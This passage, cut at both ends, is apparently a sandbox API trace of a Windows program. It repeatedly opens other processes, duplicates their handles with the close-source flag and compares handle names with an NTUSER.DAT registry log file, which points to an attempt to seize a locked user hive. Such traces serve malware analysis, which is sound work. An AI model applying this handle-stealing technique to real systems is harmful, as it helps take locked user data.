dwMilliseconds=0xfa) returned 0x0 [0162.286] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.286] CloseHandle (hObject=0x1e4) returned 1 [0162.286] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0162.286] CloseHandle (hObject=0x194) returned 1 [0162.286] CloseHandle (hObject=0x1e8) returned 1 [0162.286] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x178) returned 0x1e8 [0162.287] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.287] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.287] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.288] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.288] CloseHandle (hObject=0x1e4) returned 1 [0162.288] _wcsicmp (_Str1="\\InitShutdown", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -5 [0162.288] CloseHandle (hObject=0x194) returned 1 [0162.288] CloseHandle (hObject=0x1e8) returned 1 [0162.289] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x178) returned 0x1e8 [0162.289] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xcc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.289] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.289] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.290] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.290] CloseHandle (hObject=0x1e4) returned 1 [0162.290] _wcsicmp (_Str1="\\InitShutdown", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -5 [0162.290] CloseHandle (hObject=0x194) returned 1 [0162.290] CloseHandle (hObject=0x1e8) returned 1 [0162.290] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x178) returned 0x1e8 [0162.290] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xd0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.290] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.291] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.292] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.292] CloseHandle (hObject=0x1e4) returned 1 [0162.292] _wcsicmp (_Str1="\\InitShutdown", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -5 [0162.292] CloseHandle (hObject=0x194) returned 1 [0162.292] CloseHandle (hObject=0x1e8) returned 1 [0162.292] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x178) returned 0x1e8 [0162.292] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xf4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.292] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.293] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.294] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.294] CloseHandle (hObject=0x1e4) returned 1 [0162.294] CloseHandle (hObject=0x194) returned 1 [0162.294] CloseHandle (hObject=0x1e8) returned 1 [0162.294] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x178) returned 0x1e8 [0162.294] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x12c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.294] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.295] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.295] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.296] CloseHandle (hObject=0x1e4) returned 1 [0162.296] CloseHandle (hObject=0x194) returned 1 [0162.296] CloseHandle (hObject=0x1e8) returned 1 [0162.296] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x178) returned 0x1e8 [0162.296] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x130, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.296] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.297] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.300] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.300] CloseHandle (hObject=0x1e4) returned 1 [0162.300] CloseHandle (hObject=0x194) returned 1 [0162.300] CloseHandle (hObject=0x1e8) returned 1 [0162.300] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x178) returned 0x1e8 [0162.300] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x134, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.300] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.301] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.302] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.302] CloseHandle (hObject=0x1e4) returned 1 [0162.302] _wcsicmp (_Str1="\\CatalogChangeListener-178-0", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -11 [0162.302] CloseHandle (hObject=0x194) returned 1 [0162.302] CloseHandle (hObject=0x1e8) returned 1 [0162.302] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x178) returned 0x1e8 [0162.302] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x14c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.303] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.303] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.304] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.304] CloseHandle (hObject=0x1e4) returned 1 [0162.304] CloseHandle (hObject=0x194) returned 1 [0162.305] CloseHandle (hObject=0x1e8) returned 1 [0162.305] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x178) returned 0x1e8 [0162.305] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x150, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.305] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.306] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.306] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.306] CloseHandle (hObject=0x1e4) returned 1 [0162.307] CloseHandle (hObject=0x194) returned 1 [0162.307] CloseHandle (hObject=0x1e8) returned 1 [0162.307] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x184) returned 0x1e8 [0162.307] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.307] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.308] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.308] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.309] CloseHandle (hObject=0x1e4) returned 1 [0162.309] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0162.309] CloseHandle (hObject=0x194) returned 1 [0162.309] CloseHandle (hObject=0x1e8) returned 1 [0162.309] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x184) returned 0x1e8 [0162.309] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xb4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.309] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.310] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.311] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.311] CloseHandle (hObject=0x1e4) returned 1 [0162.311] CloseHandle (hObject=0x194) returned 1 [0162.311] CloseHandle (hObject=0x1e8) returned 1 [0162.311] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x184) returned 0x1e8 [0162.311] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xb8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.311] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.312] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.313] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.313] CloseHandle (hObject=0x1e4) returned 1 [0162.313] CloseHandle (hObject=0x194) returned 1 [0162.313] CloseHandle (hObject=0x1e8) returned 1 [0162.313] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x184) returned 0x1e8 [0162.313] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.313] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.314] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.315] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.315] CloseHandle (hObject=0x1e4) returned 1 [0162.315] CloseHandle (hObject=0x194) returned 1 [0162.315] CloseHandle (hObject=0x1e8) returned 1 [0162.315] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x184) returned 0x1e8 [0162.315] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.315] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.316] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.317] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.317] CloseHandle (hObject=0x1e4) returned 1 [0162.317] CloseHandle (hObject=0x194) returned 1 [0162.317] CloseHandle (hObject=0x1e8) returned 1 [0162.317] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x184) returned 0x1e8 [0162.317] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xe8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.317] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.318] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.319] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.319] CloseHandle (hObject=0x1e4) returned 1 [0162.319] CloseHandle (hObject=0x194) returned 1 [0162.319] CloseHandle (hObject=0x1e8) returned 1 [0162.319] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1ac) returned 0x1e8 [0162.319] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.319] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.320] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.321] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.321] CloseHandle (hObject=0x1e4) returned 1 [0162.321] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0162.321] CloseHandle (hObject=0x194) returned 1 [0162.321] CloseHandle (hObject=0x1e8) returned 1 [0162.321] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1ac) returned 0x1e8 [0162.321] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x154, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.321] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.322] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.323] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.323] CloseHandle (hObject=0x1e4) returned 1 [0162.323] CloseHandle (hObject=0x194) returned 1 [0162.323] CloseHandle (hObject=0x1e8) returned 1 [0162.323] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x1e8 [0162.323] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.323] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.324] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.325] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.325] CloseHandle (hObject=0x1e4) returned 1 [0162.325] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0162.325] CloseHandle (hObject=0x194) returned 1 [0162.325] CloseHandle (hObject=0x1e8) returned 1 [0162.325] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x1e8 [0162.325] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xec, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.325] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.326] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.330] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.330] CloseHandle (hObject=0x1e4) returned 1 [0162.330] _wcsicmp (_Str1="\\ntsvcs", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -2 [0162.330] CloseHandle (hObject=0x194) returned 1 [0162.330] CloseHandle (hObject=0x1e8) returned 1 [0162.330] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x1e8 [0162.330] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xf0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.330] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.331] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.333] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.334] CloseHandle (hObject=0x1e4) returned 1 [0162.334] _wcsicmp (_Str1="\\ntsvcs", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -2 [0162.334] CloseHandle (hObject=0x194) returned 1 [0162.334] CloseHandle (hObject=0x1e8) returned 1 [0162.334] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x1e8 [0162.334] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xf4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.334] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.335] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.335] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.335] CloseHandle (hObject=0x1e4) returned 1 [0162.335] _wcsicmp (_Str1="\\ntsvcs", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -2 [0162.335] CloseHandle (hObject=0x194) returned 1 [0162.335] CloseHandle (hObject=0x1e8) returned 1 [0162.336] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x1e8 [0162.336] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xf8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.336] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.336] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.337] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.337] CloseHandle (hObject=0x1e4) returned 1 [0162.337] CloseHandle (hObject=0x194) returned 1 [0162.337] CloseHandle (hObject=0x1e8) returned 1 [0162.337] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x1e8 [0162.337] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x104, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.337] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.338] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.339] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.339] CloseHandle (hObject=0x1e4) returned 1 [0162.339] _wcsicmp (_Str1="\\scerpc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0162.339] CloseHandle (hObject=0x194) returned 1 [0162.339] CloseHandle (hObject=0x1e8) returned 1 [0162.339] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x1e8 [0162.339] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x108, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.339] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.340] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.340] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.341] CloseHandle (hObject=0x1e4) returned 1 [0162.341] _wcsicmp (_Str1="\\scerpc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0162.341] CloseHandle (hObject=0x194) returned 1 [0162.341] CloseHandle (hObject=0x1e8) returned 1 [0162.341] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x1e8 [0162.341] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.341] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.342] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.343] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.343] CloseHandle (hObject=0x1e4) returned 1 [0162.343] _wcsicmp (_Str1="\\scerpc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0162.343] CloseHandle (hObject=0x194) returned 1 [0162.343] CloseHandle (hObject=0x1e8) returned 1 [0162.343] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x1e8 [0162.343] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x2d4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.343] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.346] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.347] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.347] CloseHandle (hObject=0x1e4) returned 1 [0162.347] CloseHandle (hObject=0x194) returned 1 [0162.347] CloseHandle (hObject=0x1e8) returned 1 [0162.347] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x1e8 [0162.347] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x2d8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.347] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.349] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.350] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | 